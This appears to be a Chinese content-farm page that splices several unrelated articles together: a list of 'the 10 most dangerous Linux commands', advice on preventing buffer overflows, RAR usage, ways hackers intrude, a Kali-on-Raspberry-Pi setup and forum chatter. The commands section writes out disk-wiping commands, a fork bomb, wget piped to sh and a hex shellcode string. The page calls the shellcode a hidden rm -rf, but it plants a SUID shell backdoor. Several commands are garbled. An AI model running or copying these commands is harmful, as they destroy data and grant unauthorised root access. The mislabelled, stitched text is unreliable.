linux網(wǎng)絡(luò)命令黑客 linux黑客攻擊工具

Linux中最危險的10個命令

Linux中最危險的10個命令

溫嶺網(wǎng)站制作公司哪家好,找創(chuàng)新互聯(lián)!從網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、響應(yīng)式網(wǎng)站建設(shè)等網(wǎng)站項目制作,到程序開發(fā),運營維護(hù)。創(chuàng)新互聯(lián)成立于2013年到現(xiàn)在10年的時間,我們擁有了豐富的建站經(jīng)驗和運維經(jīng)驗,來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)。

對于編程人員或或者Linux系統(tǒng)管理員來說,操作Linux系統(tǒng)最常見的方法就是使用命令行。當(dāng)然,Linux命令行佷有用、很高效,但有時候也很危險,尤其是在你誤操作或者不確定你自己在正在做什么的時候。下面我就為大家盤點最危險是10個命令,一起來看看吧!

當(dāng)然,以下命令通常都是在root權(quán)限下才能將愚蠢發(fā)揮到無可救藥;在普 通用戶身份下,破壞的只是自己的一畝三分地。

1. rm -rf 命令

rm -rf命令是刪除文件夾及其內(nèi)容最快的方式之一。僅僅一丁點的敲錯或無知都可能導(dǎo)致不可恢復(fù)的系統(tǒng)崩壞。下列是一些rm 命令的選項。

rm 命令在Linux下通常用來刪除文件。

rm -r 命令遞歸的刪除文件夾,甚至是空的文件夾。(譯注:個人認(rèn)為此處應(yīng)該是說錯了,從常識看,應(yīng)該是“甚至是非空的文件夾”)

rm -f 命令能不經(jīng)過詢問直接刪除‘只讀文件’。(譯注:Linux下刪除文件并不在乎該文件是否是只讀的,而只是在意其父目錄是否有寫權(quán)限。所以,-f這個參數(shù) 只是表示不必一個個刪除確認(rèn),而是一律悄悄刪除。另外,原始的rm命令其實也是沒有刪除提示的,只是一般的發(fā)行版都會將rm通過別名的方式增加-i參數(shù)來 要求刪除確認(rèn),而-f則抑制了這個提示。)

rm -rf / : 強制刪除根目錄下所有東東。(就是說刪除完畢后,什么也沒有了。。。)

rm -rf *: 強制刪除當(dāng)前目錄的所有文件。

rm -rf . : 強制刪除當(dāng)前文件夾及其子文件夾。

從 現(xiàn)在起,當(dāng)你要執(zhí)行rm -rf命令時請留心一點。我們可以在“.bashrc”文件對‘rm‘命令創(chuàng)建rm -i的別名,來預(yù)防用 ‘rm‘命令刪除文件時的事故,它會要求你確認(rèn)每一個刪除請求。(譯注:大多數(shù)發(fā)行版已經(jīng)這樣做了,如果還沒有,請這樣做,并在使用-f參數(shù)前一定考慮好 你在做什么!譯者本人有著血淚的教訓(xùn)啊。)

2. :(){:|:};: 命令

這就是個fork 炸彈的實例。具體操作是通過定義一個名為 ‘:‘的函數(shù),它會調(diào)用自己兩次,一次在前臺另一次運行在后臺。它會反復(fù)的執(zhí)行下去直到系統(tǒng)崩潰。

:(){:|:};:

哦?你確認(rèn)你要試試么?千萬別在公司正式的服務(wù)器上實驗啊~~

3. 命令  /dev/sda

上列命令會將某個‘命令‘的輸出寫到塊設(shè)備/dev/sda中。該操作會將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù),從而導(dǎo)致整個塊設(shè)備的數(shù)據(jù)丟失。

4. mv 文件夾 /dev/null

這 個命令會移動某個‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設(shè)備是一個特殊的文件,所有寫入它的數(shù)據(jù)都會被清除,然后返回寫操作成功。(譯注:這就是黑洞啊。當(dāng)然,要說明的是,通過將文件夾移動到黑洞,并不能阻止 數(shù)據(jù)恢復(fù)軟件的救贖,所以,真正的`徹底毀滅,需要采用專用的軟件或者手法來完成——我知道你肯定有些東西想刪除得干干凈凈的。)

# mv /home/user/* /dev/null

上列命令會將User目錄所有內(nèi)容移動到/dev/null,這意味著所有東西都被‘卷入’黑洞 (null)之中。

5. wget -O- | sh

上列命令會從一個(也許是)惡意源下載一個腳本并執(zhí)行。Wget命令會下載這個腳本,而sh會(無條件的)執(zhí)行下載下來的腳本。

注意: 你應(yīng)該時刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。(譯注:所以,你真的知道你在做什么嗎?當(dāng)遇到這種需要是,我的做法是,先wget下來,然后我去讀一讀其中到底寫了些什么,然后考慮是否執(zhí)行。)

6. mkfs.ext3 /dev/sda

上列命令會格式化塊設(shè)備‘sda’,你無疑知道在執(zhí)行上列命令后你的塊設(shè)備(硬盤驅(qū) 動器)會被格式化,嶄新的!沒有任何數(shù)據(jù),直接讓你的系統(tǒng)達(dá)到不可恢復(fù)的階段。(譯注:通常不會直接使用/dev/sda這樣的設(shè)備,除非是作為raw設(shè) 備使用,一般都需要將sda分成類似sda1、sda2這樣的分區(qū)后才使用。當(dāng)然,無論你使用sda還是sda1,這樣對塊設(shè)備或分區(qū)進(jìn)行mkfs都是毀 滅性的,上面的數(shù)據(jù)都會被蒸發(fā)了。)

7. file

上列命令常用來清空文件內(nèi)容(譯注:通常也用于記錄命令輸出。 不過請在執(zhí)行前,確認(rèn)輸出的文件是空的或者還不存在,否則原來的文件可真是恢復(fù)不了了——連數(shù)據(jù)恢復(fù)軟件都未必能幫助你了。另外,我想你可能真正想用的是 “”,即累加新的輸出到文件,而不是刷新那個文件。)。如果用上列執(zhí)行時輸入錯誤或無知的輸入類似 “xt.conf” 的命令會覆蓋配置文件或其他任何的系統(tǒng)配置文件。

8. ^foo^bar

這個命令在“鮮為人知而又實用的 Linux 命令大全:”中描述過,用來編輯先前運行的命令而無需重打整個命令。但當(dāng)用foobar命令時如果你沒有徹底檢查改變原始命令的風(fēng)險,這可能導(dǎo)致真正的麻煩。(譯注:事實上,這種小技巧是譯者認(rèn)為的,少數(shù)史前時代遺留下來的無用而有害的“黑客”技巧。)

9. dd if=/dev/random of=/dev/sda

上列命令會向塊設(shè)備sda寫入隨機(jī)的垃圾文件從而擦出數(shù)據(jù)。當(dāng)然!你的系統(tǒng)可能陷入混亂和不可恢復(fù)的狀態(tài)。(譯注:記得上面說過mv到黑洞并不能徹底刪除數(shù)據(jù)么?那么這個命令就是給了你一個徹底刪除的方法!當(dāng)然為了保險起見,你可以覆寫多次。)

10. 隱藏命令

下面的命令其實就是上面第一個命令 (rm -rf)。這里的代碼是隱藏在十六進(jìn)制里的,一個無知的用戶可能就會被愚弄。在終端里運行下面命令可能會擦除你的根分區(qū)。

這個命令表明通常真正的危險是隱藏的,不會被輕易的檢測到。你必須時刻留心你在做什么結(jié)果會怎樣。不要編譯/運行從未知來源的代碼。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

注意: 不要在你的或你的同學(xué)或?qū)W校的電腦里的Linux終端或Shell執(zhí)行以上的任何一個命令,因為這將導(dǎo)致數(shù)據(jù)丟失或者系統(tǒng)崩潰。如果你想測試它們,請在虛擬機(jī)上運行。

;

如何防范Linux操作系統(tǒng)下緩沖區(qū)溢出攻擊 黑客武林

雖然Linux病毒屈指可數(shù),但是基于緩沖區(qū)溢出(BufferOverflow)漏洞的攻擊還是讓眾多Linux用戶大吃一驚。所謂“世界上第一個Linux病毒”??reman,嚴(yán)格地說并不是真正的病毒,它實質(zhì)上是一個古老的、在Linux/Unix(也包括Windows等系統(tǒng))世界中早已存在的“緩沖區(qū)溢出”攻擊程序。reman只是一個非常普通的、自動化了的緩沖區(qū)溢出程序,但即便如此,也已經(jīng)在Linux界引起很大的恐慌。

緩沖區(qū)溢出漏洞是一個困擾了安全專家30多年的難題。簡單來說,它是由于編程機(jī)制而導(dǎo)致的、在軟件中出現(xiàn)的內(nèi)存錯誤。這樣的內(nèi)存錯誤使得黑客可以運行一段惡意代碼來破壞系統(tǒng)正常地運行,甚至獲得整個系統(tǒng)的控制權(quán)。

Linux系統(tǒng)特性

利用緩沖區(qū)溢出改寫相關(guān)內(nèi)存的內(nèi)容及函數(shù)的返回地址,從而改變代碼的執(zhí)行流程,僅能在一定權(quán)限范圍內(nèi)有效。因為進(jìn)程的運行與當(dāng)前用戶的登錄權(quán)限和身份有關(guān),僅僅能夠制造緩沖區(qū)溢出是無法突破系統(tǒng)對當(dāng)前用戶的權(quán)限設(shè)置的。因此盡管可以利用緩沖區(qū)溢出使某一程序去執(zhí)行其它被指定的代碼,但被執(zhí)行的代碼只具有特定的權(quán)限,還是無法完成超越權(quán)限的任務(wù)。

但是,Linux(包括Unix)系統(tǒng)本身的一些特性卻可以被利用來沖破這種權(quán)限的局限性,使得能夠利用緩沖區(qū)溢出獲得更高的、甚至是完全的權(quán)限。主要體現(xiàn)在如下兩方面:

1.Linux(包括Unix)系統(tǒng)通過設(shè)置某可執(zhí)行文件的屬性為SUID或SGID,允許其它用戶以該可執(zhí)行文件擁有者的用戶ID或用戶組ID來執(zhí)行它。如果該可執(zhí)行文件的屬性是root,同時文件屬性被設(shè)置為SUID,則該可執(zhí)行文件就存在可利用的緩沖區(qū)溢出漏洞,可以利用它以root的身份執(zhí)行特定的、被另外安排的代碼。既然能夠使得一個具有root權(quán)限的代碼得以執(zhí)行,就能夠產(chǎn)生一個具有超級用戶root權(quán)限的Shell,那么掌握整個系統(tǒng)的控制權(quán)的危險就產(chǎn)生了。

2.Linux(包括Unix)中的許多守護(hù)進(jìn)程都是以root權(quán)限運行。如果這些程序存在可利用的緩沖區(qū)溢出,即可直接使它以root身份去執(zhí)行另外安排的代碼,而無須修改該程序的SUID或SGID屬性。這樣獲得系統(tǒng)的控制權(quán)將更加容易。

隨著現(xiàn)代網(wǎng)絡(luò)技術(shù)的發(fā)展和網(wǎng)絡(luò)應(yīng)用的深入,計算機(jī)網(wǎng)絡(luò)所提供的遠(yuǎn)程登錄機(jī)制、遠(yuǎn)程調(diào)用及執(zhí)行機(jī)制是必須的。這使得一個匿名的Internet用戶有機(jī)會利用緩沖區(qū)溢出漏洞來獲得某個系統(tǒng)的部分或全部控制權(quán)。實際上,以緩沖區(qū)溢出漏洞為攻擊手段的攻擊占了遠(yuǎn)程網(wǎng)絡(luò)攻擊中的絕大多數(shù),這給Linux系統(tǒng)帶來了極其嚴(yán)重的安全威脅。

途徑分析

通常情況下攻擊者會先攻擊root程序,然后利用緩沖區(qū)溢出時發(fā)生的內(nèi)存錯誤來執(zhí)行類似“exec(sh)”的代碼,從而獲得root的一個Shell。為了獲得root權(quán)限的Shell,攻擊者需要完成如下的工作:

1.在程序的地址空間內(nèi)安排適當(dāng)?shù)奶囟ùa。一般使用如下兩種方法在被攻擊的程序地址空間內(nèi)安排攻擊代碼。

2.通過適當(dāng)?shù)爻跏蓟拇嫫骱痛鎯ζ?,使程序在發(fā)生緩沖區(qū)溢出時不能回到原來的執(zhí)行處,而是跳轉(zhuǎn)到被安排的地址空間執(zhí)行。

當(dāng)攻擊者找到一種途徑可以變原程序的執(zhí)行代碼和流程時,攻擊的危險就產(chǎn)生了。

共2頁: 1 [2]

內(nèi)容導(dǎo)航

第 1 頁:Linux系統(tǒng)特性

防范措施

Linux下的緩沖區(qū)溢出攻擊威脅既來自于軟件的編寫機(jī)制,也來自于Linux(和Unix)系統(tǒng)本身的特性。實際上,緩沖區(qū)溢出攻擊及各種計算機(jī)病毒猖獗的根本原因在于現(xiàn)代計算機(jī)系統(tǒng)都是采用馮?諾依曼“存儲程序”的工作原理。這一基本原理使得程序和數(shù)據(jù)都可以在內(nèi)存中被繁殖、拷貝和執(zhí)行。因此,要想有效地防范緩沖區(qū)溢出攻擊就應(yīng)該從這兩個方面雙管其下。

確保代碼正確安全

緩沖區(qū)溢出攻擊的根源在于編寫程序的機(jī)制。因此,防范緩沖區(qū)溢出漏洞首先應(yīng)該確保在Linux系統(tǒng)上運行的程序(包括系統(tǒng)軟件和應(yīng)用軟件)代碼的正確性,避免程序中有不檢查變量、緩沖區(qū)大小及邊界等情況存在。比如,使用grep工具搜索源代碼中容易產(chǎn)生漏洞的庫調(diào)用,檢測變量的大小、數(shù)組的邊界、對指針變量進(jìn)行保護(hù),以及使用具有邊界、大小檢測功能的C編譯器等。

基于一定的安全策略設(shè)置系統(tǒng)

攻擊者攻擊某一個Linux系統(tǒng),必須事先通過某些途徑對要攻擊的系統(tǒng)做必要的了解,如版本信息等,然后再利用系統(tǒng)的某些設(shè)置直接或間接地獲取控制權(quán)。因此,防范緩沖區(qū)溢出攻擊的第二個方面就是對系統(tǒng)設(shè)置實施有效的安全策略。這些策略種類很多,由于篇幅有限只列舉幾個典型措施:

(1)在裝有Telnet服務(wù)的情況下,通過手工改寫“/etc/inetd.conf”文件中的Telnet設(shè)置,使得遠(yuǎn)程登錄的用戶無法看到系統(tǒng)的提示信息。具體方法是將Telnet設(shè)置改寫為:

telnet stream tcp nowait root /usr/sbin/tcpd/in.telnetd -h

末尾加上“-h”參數(shù)可以讓守護(hù)進(jìn)程不顯示任何系統(tǒng)信息,只顯示登錄提示。

(2)改寫“rc.local”文件。默認(rèn)情況下,當(dāng)?shù)卿汱inux系統(tǒng)時系統(tǒng)運行rc.local文件,顯示該Linux發(fā)行版本的名字、版本號、內(nèi)核版本和服務(wù)器名稱等信息,這使得大量系統(tǒng)信息被泄露。將“rc.local”文件中顯示這些信息的代碼注釋掉,可以使系統(tǒng)不顯示這些信息。

一種方法是在顯示這-些信息的代碼行前加“#”:

……# echo “”/etc/issue# echo “$R”/etc/issue#echo”Kernel $ (uname -r)on $a $(uname -m)”/etc/issue##echo/etc/issue……

另一種方法是將保存有系統(tǒng)信息的文件/etc/issue.net和issue刪除。這兩個文件分別用于在遠(yuǎn)程登錄和本地登錄時向用戶提供相關(guān)信息。刪除這兩個文件的同時,仍需要完成方法一中的注釋工作,否則,系統(tǒng)在啟動時將會自動重新生成這兩個文件。

(3)禁止提供finger服務(wù)。在Linux系統(tǒng)中,使用finger命令可以顯示本地或遠(yuǎn)程系統(tǒng)中目前已登錄用戶的詳細(xì)信息。禁止提供finger服務(wù)的有效方法是,通過修改該文件屬性、權(quán)限(改為600)使得只有root用戶才可以執(zhí)行該命令。

(4)處理“inetd.conf”文件。Linux系統(tǒng)通過inetd(超級服務(wù)器)程序根據(jù)網(wǎng)絡(luò)請求裝入網(wǎng)絡(luò)程序。該程序通過“/etc/inetd.conf”文件獲得inetd在監(jiān)聽哪些網(wǎng)絡(luò)端口,為每個端口啟動哪些特定服務(wù)等信息。因此,該文件同樣會泄露大量的敏感信息。解決問題的方法是,通過將其權(quán)限改為600只允許root用戶訪問,并通過改寫“/etc/inetd.conf”文件將不需要的服務(wù)程序禁止掉,最后修改該文件的屬性使其不能被修改。

總結(jié)

緩沖區(qū)溢出攻擊之所以能成為一種常見的攻擊手段,其原因在于緩沖區(qū)溢出漏洞太普遍,且易于實現(xiàn)攻擊,因此緩沖區(qū)溢出問題一直是個難題。

所幸的是,OpenBSD開發(fā)組為解決這一安全難題采用了三種新的有效策略。相信不久的將來,Linux用戶可以不再為緩沖區(qū)溢出攻擊而寢食難安了。

RAR文件在Linux下用起來

要在Linux下處理.rar文件,需要安裝RARforLinux。該軟件可以從網(wǎng)上下載,但要記住,它不是免費的。大家可從下載RARforLinux 3.2.0,然后用下面的命令安裝:

# tar -xzpvf rarlinux-3.2.0.tar.gz

# cd rar

# make

安裝后就有了rar和unrar這兩個程序,rar是壓縮程序,unrar是解壓程序。它們的參數(shù)選項很多,這里只做簡單介紹,依舊舉例說明一下其用法:

# rar a all *.mp3

這條命令是將所有.mp3的文件壓縮成一個rar包,名為all.rar,該程序會將.rar 擴(kuò)展名將自動附加到包名后。

# unrar e all.rar

這條命令是將all.rar中的所有文件解壓出來。

黑客是怎樣通過網(wǎng)絡(luò)入侵電腦的?。?/h2>

黑客是入侵別人電腦的方法有9種。

1、獲取口令

這又有三種方法:

一是通過網(wǎng)絡(luò)監(jiān)聽非法得到用戶口令,這類方法有一定的局限性,但危害性極大,監(jiān)聽者往往能夠獲得其所在網(wǎng)段的所有用戶賬號和口令,對局域網(wǎng)安全威脅巨大;二是在知道用戶的賬號后(如電子郵件@前面的部分)利用一些專門軟件強行破解用戶口令,這種方法不受網(wǎng)段限制,但黑客要有足夠的耐心和時間;三是在獲得一個服務(wù)器上的用戶口令文件(此文件成為Shadow文件)后,用暴力破解程序破解用戶口令,該方法的使用前提是黑客獲得口令的Shadow文件。

此方法在所有方法中危害最大,因為它不需要像第二種方法那樣一遍又一遍地嘗試登錄服務(wù)器,而是在本地將加密后的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶密碼,尤其對那些弱智用戶(指口令安全系數(shù)極低的用戶,如某用戶賬號為zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一兩分鐘內(nèi),甚至幾十秒內(nèi)就可以將其干掉。

2、放置特洛伊木馬程序

特洛伊木馬程序可以直接侵入用戶的電腦并進(jìn)行破壞,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網(wǎng)上直接下載,一旦用戶打開了這些郵件的附件或者執(zhí)行了這些程序之后,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,并在自己的計算機(jī)系統(tǒng)中隱藏一個可以在Windows啟動時悄悄執(zhí)行的程序。

當(dāng)您連接到因特網(wǎng)上時,這個程序就會通知黑客,來報告您的IP地址以及預(yù)先設(shè)定的端口。黑客在收到這些信息后,再利用這個潛伏在其中的程序,就可以任意地修改您的計算機(jī)的參數(shù)設(shè)定、復(fù)制文件、窺視你整個硬盤中的內(nèi)容等,從而達(dá)到控制你的計算機(jī)的目的。

3、WWW的欺騙技術(shù)

在網(wǎng)上用戶可以利用IE等瀏覽器進(jìn)行各種各樣的WEB站點的訪問,如閱讀新聞組、咨詢產(chǎn)品價格、訂閱報紙、電子商務(wù)等。然而一般的用戶恐怕不會想到有這些問題存在:正在訪問的網(wǎng)頁已經(jīng)被黑客篡改過,網(wǎng)頁上的信息是虛假的!例如黑客將用戶要瀏覽的網(wǎng)頁的URL改寫為指向黑客自己的服務(wù)器,當(dāng)用戶瀏覽目標(biāo)網(wǎng)頁的時候,實際上是向黑客服務(wù)器發(fā)出請求,那么黑客就可以達(dá)到欺騙的目的了。

4、電子郵件攻擊

電子郵件攻擊主要表現(xiàn)為兩種方式:

一是電子郵件轟炸和電子郵件“滾雪球”,也就是通常所說的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發(fā)送數(shù)以千計、萬計甚至無窮多次的內(nèi)容相同的垃圾郵件,致使受害人郵箱被“炸”,嚴(yán)重者可能會給電子郵件服務(wù)器操作系統(tǒng)帶來危險,甚至癱瘓;

二是電子郵件欺騙,攻擊者佯稱自己為系統(tǒng)管理員(郵件地址和系統(tǒng)管理員完全相同),給用戶發(fā)送郵件要求用戶修改口令(口令可能為指定字符串)或在貌似正常的附件中加載病毒或其他木馬程序(據(jù)筆者所知,某些單位的網(wǎng)絡(luò)管理員有定期給用戶免費發(fā)送防火墻升級程序的義務(wù),這為黑客成功地利用該方法提供了可乘之機(jī)),這類欺騙只要用戶提高警惕,一般危害性不是太大。

5、通過一個節(jié)點來攻擊其他節(jié)點

黑客在突破一臺主機(jī)后,往往以此主機(jī)作為根據(jù)地,攻擊其他主機(jī)(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。他們可以使用網(wǎng)絡(luò)監(jiān)聽方法,嘗試攻破同一網(wǎng)絡(luò)內(nèi)的其他主機(jī);也可以通過IP欺騙和主機(jī)信任關(guān)系,攻擊其他主機(jī)。這類攻擊很狡猾,但由于某些技術(shù)很難掌握,如IP欺騙,因此較少被黑客使用。

6、網(wǎng)絡(luò)監(jiān)聽

網(wǎng)絡(luò)監(jiān)聽是主機(jī)的一種工作模式,在這種模式下,主機(jī)可以接受到本網(wǎng)段在同一條物理通道上傳輸?shù)乃行畔?,而不管這些信息的發(fā)送方和接受方是誰。此時,如果兩臺主機(jī)進(jìn)行通信的信息沒有加密,只要使用某些網(wǎng)絡(luò)監(jiān)聽工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號在內(nèi)的信息資料。雖然網(wǎng)絡(luò)監(jiān)聽獲得的用戶帳號和口令具有一定的局限性,但監(jiān)聽者往往能夠獲得其所在網(wǎng)段的所有用戶帳號及口令。

7、尋找系統(tǒng)漏洞

許多系統(tǒng)都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統(tǒng)或應(yīng)用軟件本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗證漏洞和IE5漏洞等,這些漏洞在補丁未被開發(fā)出來之前一般很難防御黑客的破壞,除非你將網(wǎng)線拔掉;還有一些漏洞是由于系統(tǒng)管理員配置錯誤引起的,如在網(wǎng)絡(luò)文件系統(tǒng)中,將目錄和文件以可寫的方式調(diào)出,將未加Shadow的用戶密碼文件以明碼方式存放在某一目錄下,這都會給黑客帶來可乘之機(jī),應(yīng)及時加以修正。

8、利用帳號進(jìn)行攻擊

有的黑客會利用操作系統(tǒng)提供的缺省賬戶和密碼進(jìn)行攻擊,例如許多UNIX主機(jī)都有FTP和Guest等缺省賬戶(其密碼和賬戶名同名),有的甚至沒有口令。黑客用Unix操作系統(tǒng)提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。這類攻擊只要系統(tǒng)管理員提高警惕,將系統(tǒng)提供的缺省賬戶關(guān)掉或提醒無口令用戶增加口令一般都能克服。

9、偷取特權(quán)

利用各種特洛伊木馬程序、后門程序和黑客自己編寫的導(dǎo)致緩沖區(qū)溢出的程序進(jìn)行攻擊,前者可使黑客非法獲得對用戶機(jī)器的完全控制權(quán),后者可使黑客獲得超級用戶的權(quán)限,從而擁有對整個網(wǎng)絡(luò)的絕對控制權(quán)。這種攻擊手段,一旦奏效,危害性極大。

如何用樹莓派和Kali Linux搭建便攜式的黑客工作站

需要的東西:

樹莓派(B+或者2更好)

一個電池組(任何給智能手機(jī)充電用的帶USB端口的外接5V電池應(yīng)當(dāng)就可以,當(dāng)然也有更多優(yōu)雅的方法,如果你感興趣的話)

一張無線網(wǎng)卡

一張8GB的SD卡

一個PiTFT觸屏(如果為了使用更好的屏幕且不介意隨身攜帶大點的設(shè)備,也可以用官方7英寸的觸屏)

一個外殼(可選,但如果你隨身帶著樹莓派,它就很有用。把PiTFT和樹莓派裝入這個Adafruit的外殼非常不錯)

鍵盤(我喜歡使用帶觸摸板的小無線鍵盤,適合裝進(jìn)小包里。)

一個臺式計算機(jī)(用來完成最開始的安裝)

第一步:在樹莓派上安裝Kali

視頻地址:

在開始之前,你需要下載和安裝Kali Linux支持樹莓派的觸屏版本鏡像。它與安裝任何其他的樹莓派操作系統(tǒng)一樣,我們在這里已經(jīng)詳細(xì)介紹過了,不過以下是簡易版本:

在Windows下如何安裝Kali到SD卡

1.下載 Kali Linux Raspberry Pi TFT image ,解壓里面的.img文件。注意:如果你使用的不是觸摸屏,請下載Kali Linux支持樹莓派的常規(guī)版本。

2.下載Win32DiskImager并解壓其中的程序(.exe文件)。

3.使用讀卡器把SD卡插入到Windows PC機(jī)。

4.雙擊打開剛剛下載的程序 Win32DiskImager.exe 。如果你運行的是 Windows 7或者8,則右擊執(zhí)行程序并選擇“以管理員身份運行”。

5.如果SD卡沒有被該程序自動檢測到,點擊右上角(“設(shè)備”欄)的下拉菜單,從列表中選擇SD卡。

6.在應(yīng)用的鏡像文件選擇區(qū),點擊小文件夾圖標(biāo),選擇 Raspbian.img 文件。

7.點擊寫入(Write)按鈕并等待 Win32DiskImager 完成。當(dāng)它完成后,你可以安全地彈出SD卡,然后把它插入樹莓派。

在OS X下如何安裝Kali到SD卡

1.下載 Kali Linux Raspberry Pi TFT image ,解壓里面的.img文件。注意:如果你使用的不是觸摸屏,請下載 Kali Linux支持樹莓派的常規(guī)版本。

2.下載 RPi-sd card builder(一定要為你所安裝的OS X選擇合適的版本)并解壓程序。

3.使用讀卡器把 SD 卡插入到 Mac。

4.打開RPi-sd card builder。你會被立刻要求選擇一個Raspbian鏡像。選擇之前下載的.img文件。

5.你會被詢問SD卡是否已連接。由于我們之前就插入了,那它已經(jīng)連接上了,所以點擊繼續(xù)(Continue)。然后會出現(xiàn)SD卡選擇界面。如果你只插入了一個,并且在列表中也沒有看到其它的,它會被選中。否則,就選擇所希望使用的SD卡并點擊OK。

6.輸入管理員密碼,點擊OK。

7.你會被詢問SD卡是否已被彈出。這是正常的,因為只有被卸載后它才可以執(zhí)行直接復(fù)制。再次確認(rèn)SD卡在Finder中不再被使用。不要從USB端口中移除它。當(dāng)你確定要彈出時,點擊繼續(xù)(Continue)。

8.RPi-sd card builder 完成SD卡的準(zhǔn)備工作,安全彈出卡并插入到樹莓派中。

樹莓派有一個觸屏可適配的GPIO(通用輸入/輸出),即樹莓派主板角上的一組針腳,如何使用顯而易見。繼續(xù),插入顯示屏到樹莓派。

第三步:插上所有的電源并啟動

安裝好顯示器后,就該接通其他零件的電源了。把Wi-Fi適配器和鍵盤接入到USB端口。再把樹莓派連接到電池組。

啟動過程有可能有點緩慢和粗陋,不必為此擔(dān)心。首先,在啟動開始前,會先顯示一會兒白屏。最終,將顯示登錄界面。

第四步:登錄并且啟用無線網(wǎng)卡

現(xiàn)在該登錄和啟用無線網(wǎng)卡了,這樣你才可以真正地使用 Kali Linux 里的工具。樹莓派會自動識別無線網(wǎng)卡,但是你仍然需要連接上網(wǎng)絡(luò)。首先,需要啟動 Kali Linux 圖形用戶界面并確保一切正常:

1.樹莓派的命令行上將顯示用戶名和密碼的提示。輸入用戶名 root 和密碼 toor (一會兒要修改掉該密碼)。

2.輸入 startx 然后回車來啟動 Kali 圖形界面。在樹莓派上加載可能需要一段時間。

3.現(xiàn)在你可以用觸屏和鍵盤來操控樹莓派。點擊底部任務(wù)欄的終端圖標(biāo)來打開命令行。

4.設(shè)置無線網(wǎng)卡,在命令行輸入nano /etc/network/interfaCES 并回車來加載Wi-Fi設(shè)置的配置文件。

5.增加如下文本到你剛剛打開的文件,替換上你自己的網(wǎng)絡(luò)信息:

auto wlan0 iface wlan0 inet dhcp wpa-ssid “你的網(wǎng)絡(luò)名稱” wpa-psk “網(wǎng)絡(luò)密碼”

完成后,按下 Ctrl+X 保存并退出。無線網(wǎng)卡現(xiàn)在可以使用了(有可能需要先重啟)。

第五步:修改密碼

在開始任何操作之前,很有必要修改設(shè)備的root密碼(避免其他也有類似黑客技能的人控制它)。還好這個過程很簡單。

1.如果你還在命令行(如果不在,點擊 Kali 的終端圖標(biāo)重新打開它),輸入 passwd 并回車。

2.輸入新密碼兩次。

3.重新配置 OpenSSH 也有好處,這樣它不會是默認(rèn)設(shè)置。輸入 dpkg-reconfigure openssh-server 并回車。

現(xiàn)在你的小型便攜式系統(tǒng)已設(shè)置完成且是安全的。

為什么說黑客都用LINUX

因為linux是一種自由和開放源代碼的類UNIX操作系統(tǒng),任何人都可以自由使用、完全不受任何限制。

Linux是一套免費使用和自由傳播的類Unix操作系統(tǒng),是一個基于POSIX和UNIX的多用戶、多任務(wù)、支持多線程和多CPU的操作系統(tǒng)。

它能運行主要的UNIX工具軟件、應(yīng)用程序和網(wǎng)絡(luò)協(xié)議。它支持32位和64位硬件。Linux繼承了Unix以網(wǎng)絡(luò)為核心的設(shè)計思想,是一個性能穩(wěn)定的多用戶網(wǎng)絡(luò)操作系統(tǒng)。

用戶可以通過網(wǎng)絡(luò)或其他途徑免費獲得,并可以任意修改其源代碼。這是其他的操作系統(tǒng)所做不到的。正是由于這一點,來自全世界的無數(shù)程序員參與了Linux的修改、編寫工作,程序員可以根據(jù)自己的興趣和靈感對其進(jìn)行改變,這讓Linux吸收了無數(shù)程序員的精華,不斷壯大。

Linux支持多用戶,各個用戶對于自己的文件設(shè)備有自己特殊的權(quán)利,保證了各用戶之間互不影響。多任務(wù)則是現(xiàn)在電腦最主要的一個特點,Linux可以使多個程序同時并獨立地運行。

如何學(xué)會做使用linux的黑客?。恳驗槲椰F(xiàn)在有些模糊

呵呵.黑客.我的最愛.

linux系統(tǒng)是由控制臺為最主要的操作系統(tǒng).

你很喜歡windows下的dos學(xué)那個應(yīng)該也不難.

想學(xué)黑客是么?Q35326014我不做你師傅,但是遇到難題大家可以一起討論.

分享文章:linux網(wǎng)絡(luò)命令黑客 linux黑客攻擊工具
URL標(biāo)題:http://muchs.cn/article10/hjdsdo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站建設(shè)網(wǎng)站維護(hù)、網(wǎng)站內(nèi)鏈電子商務(wù)、App設(shè)計、軟件開發(fā)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

手機(jī)網(wǎng)站建設(shè)